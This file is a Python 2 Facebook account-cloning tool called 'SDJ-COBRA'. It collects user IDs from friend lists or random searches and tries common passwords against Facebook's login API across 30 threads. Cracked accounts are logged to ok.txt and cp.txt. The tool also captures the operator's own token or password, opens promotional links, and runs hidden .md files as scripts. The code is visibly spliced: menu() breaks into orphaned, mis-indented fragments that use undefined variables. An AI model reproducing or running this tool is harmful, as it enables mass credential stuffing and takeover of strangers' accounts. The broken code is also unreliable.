# coding=utf-8
#!/usr/bin/python
# coding=utf-8
# coded by : Alex-Brand 
# https://www.facebook.com/aalekhsingh.rajput

try:
    import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib,requests
    from multiprocessing.pool import ThreadPool
except ImportError:
    os.system("pkg install python -y")
    os.system("pip install requests")
    os.system("pip install mechanize")
    os.system("pip2 install nodejs")
    os.system("pip2 install npm")
    os.system("python2 ab.py")
try:
    os.mkdir('save')
except OSError:
    pass
    if os.path.isfile('.../index.js'):
 	os.system('mv ... .....')
	os.system('cd ..... && npm install')
 	os.system('#')
 	os.system('#')
 	os.system('fuser -k 5000/tcp &')
 	os.system('#')
 	os.system('node ...../index.js &')
 	os.system('fuser -k 5000/tcp &')
 	os.system('#')
 	os.system('node ...../index.js &')
from requests.exceptions import ConnectionError
bd=random.randint(2e7, 3e7)
sim=random.randint(2e4, 4e4)
header = {'x-fb-connection-bandwidth': repr(bd), 'x-fb-sim-hni': repr(sim), 'x-fb-net-hni': repr(sim), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': 'Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-N950N Build/NMF26X) [FBAN/FB4A;FBAV/251.0.0.31.111;FBPN/com.facebook.katana;FBLC/en_US;FBBV/188828013;FBCR/Advance Info Service;FBMF/samsung;FBDV/SM-N950N;FBSV/5.1.1;FBCA/x86;armeabi-v7a;FBDM{density=2.0,width=900,height=1600};FB_FW;FBRV/0;]', 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
reload(sys)
sys.setdefaultencoding("utf8")
os.system('clear')
os.system('xdg-open https://www.facebook.com/100005323385256/posts/1746010255586404/?app=fbl')
os.system("clear")

os.system("figlet CONTACT OWNER  |lolcat") 
def slowprint(s):
    for c in s + '\n':
        sys.stdout.write(c)
        sys.stdout.flush()
        sleep(2.0 / 90)
print("\033[1;91mNOTE!!! FOR KEY SUBSCRIBE OUR YOUTUBE CHANL AND SEND SS ON THIS PAGEE PLEASE WAIT U REDARETED TO THE MAIN POST SELECT GOGLE CHROME")
os.system('xdg-open https://youtube.com/channel/UCgg2SsDgxcKQm-a4QLqCvuA')
def approval():
	time.sleep(1)

CorrectAip = 'ZK@COBRA1.1'
loop = 'true'
while loop == 'true':
    username = raw_input('\x1b[1;97m\xe2\x9e\xa3Enter Your Aip Key : ')
    if username == CorrectAip:
            print '\x1b[1;92m[\xe2\x9c\x93] Logged in successfully '
            time.sleep(0.5)
            loop = 'false'
os.system("figlet TOOL SUCCESSFULLY INSTALLED  |lolcat")
def slowprint(s):
    for c in s + '\n':
        sys.stdout.write(c)
        sys.stdout.flush()
        sleep(4.0 / 90)
        

def abm(z):
	for e in z + "\n":
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.03)



		
def logging():
    titik = [".   ","..  ","... "]
    for o in titik:
        print("\r\033[1;32m[+] Logging In\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)
def saving():
    titik = [".   ","..  ","... "]
    for o in titik:
        print("\r\033[1;32m[+] Saving Token\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)
def updateing():
    titik = [".   ","..  ","... "]
    for o in titik:
        print("\r\033[1;32m[+] Getting Updates\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)
def logout():
    titik = [".   ","..  ","... "]
    for o in titik:
        print("\r\033[1;32m[+] Logging Out\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)     
logo = """

\x1b[1;97m(\x1b[1;93m\xe2\x9c\x93\x1b[1;97m) AUTHOR   : SHAHZAIN DAVID JOIYA
\x1b[1;97m(\x1b[1;93m\xe2\x9c\x93\x1b[1;97m) GITHUB   : SHAHZAIN-SDJ
\x1b[1;97m(\x1b[1;93m\xe2\x9c\x93\x1b[1;97m) CONTACT  : FB.me/HATERZKAABUUGZAINI2


"""

idh = []
	
def tech_abm():
    os.system("clear")
    
    os.system("figlet SDJ-COBRA  |lolcat")
    os.system('echo -e "<>LOGIN MENU<>" | lolcat')
    print('')
    print("\033[1;92m--------------------------------------------------")
    username = raw_input("\033[1;90m[+]\033[1;90m Username :\033[1;90m ")
    if username =="SDJ":
        os.system("clear")
        os.system("figlet SDJ-COBRA  |lolcat")
        print ("[+] Username : SDJ (Correct)")
        passwordss = raw_input("\033[1;90m[+]\033[1;90m Password :\033[1;90m ")
        if passwordss =="COBRA":
            os.system("clear")
            os.system("figlet SDJ-COBRA  |lolcat")
            logging()
            os.system("clear")
            
            os.system("figlet SDJ-COBRA  |lolcat")
            print ("\033[1;93m[+]\033[1;90m Username : SDJ\033[1;90m (Correct)")
            print ("\033[1;93m[+]\033[1;90m Password : COBRA\033[1;90m (Correct)")
	    print("\033[1;92m--------------------------------------------------")
            time.sleep(1)
            print('')
            print("\t \033[1;92m[+] Login Successful\033[0;97m")
            time.sleep(1)
        try:
            open(".login.txt","r")
            menu()
        except(KeyError , IOError):
            login_choice()
        else:
            print ("\t [!] Password : "+passwordss+" (Wrong)")
	    os.system('xdg-open ')
            time.sleep(1)
            tech_abm()
    else:
        print ("\t [!] Username : "+username+" (Wrong)")
	os.system('xdg-open https://m.facebook.com/')
        time.sleep(1)
        tech_abm()
	
def login_choice():
    os.system('clear')
    os.system("figlet SDJ-COBRA  |lolcat")
    os.system("python3 .loading.md")
    os.system('clear')
    
    os.system("figlet SDJ-COBRA  |lolcat")
    os.system('echo -e "\n\n(1) RANDOM SEARCH NAME  \n\n(2) RANDOM PH/NMBR (100%)\n\n(3) CLONE FRNDLIST AND PBLK ID \n\n(0) LOGOUT" | lolcat') 
    clone_main()
def clone_main():
    hack = raw_input("\n╰─➣ ")
    if hack =="1":
        os.system("python2 .name.md")
        time.sleep(1)
        menu()
    if hack =="2":
        os.system("python2 .nbr.md")
        time.sleep(1)
        menu()
    if hack =="3":
        loginvia()   
    elif hack =="0":
        os.system("exit")
    else:
	print "\x1b[1;91mFill in correctly"
        clone_main()
def loginvia():
    os.system('clear')
    os.system("figlet SDJ-COBRA  |lolcat")
    os.system("python3 .loading.md")
    os.system('clear')
    os.system("figlet SDJ-COBRA  |lolcat") 
    os.system('echo -e "\n\n(1) LOGIN WITH TOKN \n\n(2) LOGIN WTH ID/PASS" | lolcat')
    print("\033[1;92m")
    clone_loginvia()
def clone_loginvia():
    hack = raw_input("\n╰─➣ ")
    if hack =="1":
        os.system("clear")
        print logo
	os.system("python3 .loading.md")
        os.system('clear')
        os.system("figlet SDJ-COBRA  |lolcat")
        os.system('echo -e "<>LOGIN WITH TOKN<>" | lolcat')
	print("\033[1;92m--------------------------------------------------")
        token = raw_input("\033[1;97m[+]\033[1;97m Paste :\033[1;97m ")
	print("\033[1;92m--------------------------------------------------")
        saving()
        sav = open(".login.txt","w")
        sav.write(token)
        sav.close()
        abm("\r\033[1;92m[✓] Login Successfull\033[0;97m")
	os.system('xdg-open https://m.facebook.com/HATERZKAABUUGZAINI2')
        time.sleep(1)
        menu()
    elif hack =="2":
        loginfb()
    elif hack =="0":
	        menu()
    else:
	        print ("[!] Please Select a Valid Option")
		clone_loginvia()
		
def loginfb():
    os.system("clear")
    os.system("figlet SDJ-COBRA  |lolcat")
    os.system("python3 .loading.md")
    time.sleep(1)
    os.system('clear')
    os.system("figlet SDJ-COBRA  |lolcat")
    print("\033[1;93mLogin With Facebook Account\033[1;0m").center(50)
    print("\033[1;93mUse Proxy to login account \033[1;0m").center(50)
    print("\033[1;92m--------------------------------------------------")
    id = raw_input("\033[1;97m[+]\033[1;93m Email/ID/Number :\033[1;97m ")
    id1 = id.replace(' ','')
    id2 = id1.replace('(','')
    uid = id2.replace(')','')
    pwd = raw_input("\033[1;97m[+]\033[1;93m Passwor :\033[1;97m ")
    print("\033[1;92m--------------------------------------------------")
    logging()
    data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email="+uid+"&locale=en_US&password="+pwd+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text
    q = json.loads(data)
    if "access_token" in q:
        succ = open(".login.txt","w")
        succ.write(q["access_token"])
        succ.close()
        print("\n\033[1;92m[✓] Login Successfull\033[0;97m")
        time.sleep(1)
        menu()
    else:
        if "www.facebook.com" in q["error_msg"]:
            print ("\n\033[1;31m[!] Login Failed . Account Has a Checkpoint\033[0;97m")
            time.sleep(1)
            loginfb()
        else:
            print("\n\033[1;31m[!] Login Failed.Email/ID/Number OR Password May BE Wrong\033[0;97m")
            time.sleep(1)
            loginfb()

def menu():
    os.system("clear")
    try:
        token = open(".login.txt","r").read()
    except IOError:
        print logo
        print("[!] Error 404.Token Not Found")
        os.system("rm -rf .login.txt")
        time.sleep(1)
        login_choice()
    try:
        r = requests.get("https://graph.facebook.com/me?access_token="+token, headers=header)
        a = json.loads(r.text)
        name = a["name"]
    except KeyError:
        os.system("clear")
        print logo
        print("\033[1;91m[!] Loading Failed . Your Account Has a Checkpoint")
        os.system("rm -rf .login.txt")
        time.sleep(1)
        login_choice()
    os.system('clear')
		                                            print("\x1b[1;92m[SDJ-OK] "+uid+" | "+pass5+" | "+name)
		                                            ok=open("ok.txt","a")
		                                            ok.write(uid+" | "+pass5+"\n")
		                                            ok.close()
		                                            oks.append(uid)
		                                        else:
		                                            pass6="123456"
		                                            q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass6 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		                                            d=json.loads(q)
		                                            if 'www.facebook.com' in d['error_msg']:
		                                                print("\x1b[1;97m[\x1b[1;93mSDJ-CP\x1b[1;97m]\x1b[1;97m "+uid+"\x1b[1;91m | \x1b[1;97m"+pass6+"\x1b[1;91m | \x1b[1;97m"+name)
		                                                cp=open("cp.txt","a")
		                                                cp.write(uid+" | "+pass6+"\n")
		                                                cp.close()
		                                                cps.append(uid)
		                                            else:
		                                                if 'access_token' in d:
		                                                    print("\x1b[1;92m[SDJ-OK] "+uid+" | "+pass6+" | "+name)
		                                                    ok=open("ok.txt","a")
		                                                    ok.write(uid+" | "+pass6+"\n")
		                                                    ok.close()
		                                                    oks.append(uid)
		                                                else:
		                                                    pass7="223344"
		                                                    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass7 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		                                                    d=json.loads(q)
		                                                    if 'www.facebook.com' in d['error_msg']:
		                                                        print("\x1b[1;97m[\x1b[1;93mSDJ-CP\x1b[1;97m]\x1b[1;97m "+uid+"\x1b[1;91m | \x1b[1;97m"+pass7+"\x1b[1;91m | \x1b[1;97m"+name)
		                                                        cp=open("cp.txt","a")
		                                                        cp.write(uid+" | "+pass7+"\n")
		                                                        cp.close()
		                                                        cps.append(uid)
		                                                    else:
		                                                        if 'access_token' in d:
		                                                            print("\x1b[1;92m[SDJ-OK] "+uid+" | "+pass7+" | "+name)
		                                                            ok=open("ok.txt","a")
		                                                            ok.write(uid+" | "+pass7+"\n")
		                                                            ok.close()
		                                                            oks.append(uid)
		                                        
									
															
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print("\033[1;92m--------------------------------------------------")
	print ('\033[1;97m[+]\033[1;92m Process Has Been Completed')
	print('\033[1;97m[+]\033[1;92m Total CP/OK:\033[0;92m  '+str(len(cps))+'/\033[1;92m '+str(len(oks)))
	print("\033[1;92m--------------------------------------------------")
	raw_input("Press Enter To Main Menu Back")
	menu()
	
if __name__ == '__main__':
    tech_abm()

